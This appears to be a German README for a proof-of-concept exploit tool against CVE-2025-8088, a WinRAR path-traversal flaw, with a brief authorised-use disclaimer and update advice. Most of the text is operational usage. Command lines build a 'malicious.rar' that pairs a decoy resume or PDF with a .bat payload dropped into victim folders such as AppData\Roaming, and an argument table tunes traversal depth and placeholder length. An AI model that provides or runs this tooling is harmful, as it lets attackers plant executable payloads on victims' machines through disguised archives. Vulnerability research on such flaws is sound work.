
Dieses PoC dient der autorisierten Untersuchung und Prüfung. CVE-2025-8088 wird aktiv ausgenutzt, und Missbrauch kann gegen Gesetze verstoßen oder Schaden verursachen. Aktualisieren Sie auf WinRAR 7.13+, um verdächtige RARs zu vermeiden.
Exploit_cve_2025_8088.ps1
python poc.py

# Basic usage (auto-discover rar.exe)
python poc.py --decoy resume.txt --payload payload.bat --drop "C:\Users\Victim\Documents"
# Full custom configuration
python poc.py \
--decoy document.pdf \
--payload script.bat \
--drop "C:\Users\Victim\AppData\Roaming" \
--rar "C:\Program Files\WinRAR\rar.exe" \
--out malicious.rar \
--workdir ./build \
--placeholder_len 150 \
--max_up 20
| Argument | Beschreibung | Beispiel |
|---|
--decoy | Pfad zur Tarn-Datei (wird erstellt, falls nicht vorhanden) | resume.txt |
--payload | Pfad zur Nutzlast-Datei (wird erstellt, falls nicht vorhanden) | payload.bat |
--drop | Absoluter Pfad zum Zielverzeichnis, in das die Nutzlast extrahiert wird | C:\Users\Victim\Documents |
| Argument | Beschreibung | Standardwert | Anmerkungen |
|---|
--rar | Pfad zu rar.exe | Automatisch erkannt | Überprüft gängige Speicherorte und PATH |
--out | Ausgabe-RAR-Dateiname | poc-cve-2025-8088.rar | Endgültiges schädliches Archiv |
--workdir | Arbeitsverzeichnis für temporäre Dateien | Aktuelles Verzeichnis (.) | |
--placeholder_len | Länge des ADS-Platzhalters | max(len(target_path), 128) | Länger = zuverlässigerer Traversal |
--max_up | Anzahl der Elternverzeichnis-Traversierungen (..\) | 16 | Mindestens 8 empfohlen |
--base_out | Zwischen-Basis-RAR-Dateiname | <out>.base.rar | Temporäre Datei, wird danach gelöscht |